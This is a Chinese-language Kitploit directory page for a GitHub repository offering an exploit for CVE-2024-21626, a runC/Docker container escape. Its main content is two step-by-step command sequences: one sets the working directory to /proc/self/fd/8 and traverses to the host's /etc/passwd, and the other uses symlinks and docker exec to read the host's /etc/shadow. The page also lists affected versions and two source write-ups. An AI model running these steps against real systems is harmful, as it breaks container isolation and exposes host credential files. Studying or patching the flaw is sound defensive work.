Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-21626 — 针对 CVE-2024-21626 的可用利用工具,这是一种通过工作目录符号链接攻击实现的 runC/Docker 容器逃逸,可访问主机文件系统。 | Kitploit
工具/GitHubGitHub/flojboj/cve-2024-21626
权限提升容器安全漏洞分析漏洞利用云安全容器逃逸
GitHubflojboj/cve-2024-21626

CVE-2024-21626

针对 CVE-2024-21626 的可用利用工具,这是一种通过工作目录符号链接攻击实现的 runC/Docker 容器逃逸,可访问主机文件系统。

查看仓库
1142年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-21626

漏洞利用(工作目录)

docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm

  • 关键是设置 -w /proc/self/fd/8\
  • 在容器内使用 cat ../../../../../../../../../etc/passwd 访问主机文件系统

漏洞利用(符号链接)

  1. docker run --name cve-2024-21626 --rm --it debian:bootworm
  2. 在容器内 - ln -sf /proc/self/fd/7/ /foo
  3. 在容器内 - ln -sf /proc/self/fd/8/ /bar
  4. docker exec -it -w /bar cve-2024-21626 sleep 120
  5. 在容器内 - ls -F /proc
  6. 在容器内 - cat /proc/9/cmdline(查找 sleep 命令的 PID)
  7. 在容器内 - cat /proc/9/cwd/../../../../../etc/shadow

受影响版本

  • runC:>= 1.0.0-rc93 且 <= 1.1.11。
  • containerd:>= 1.4.7 且 <= 1.6.27,以及 >= 1.7.0 且 <= 1.7.12。
  • Docker:在 25.0.2 中修复

来源

https://nitroc.org/en/posts/cve-2024-21626-illustrated/#exploit-via-setting-working-directory-to-procselffdfd https://labs.withsecure.com/publications/runc-working-directory-breakout--cve-2024-21626

下载工具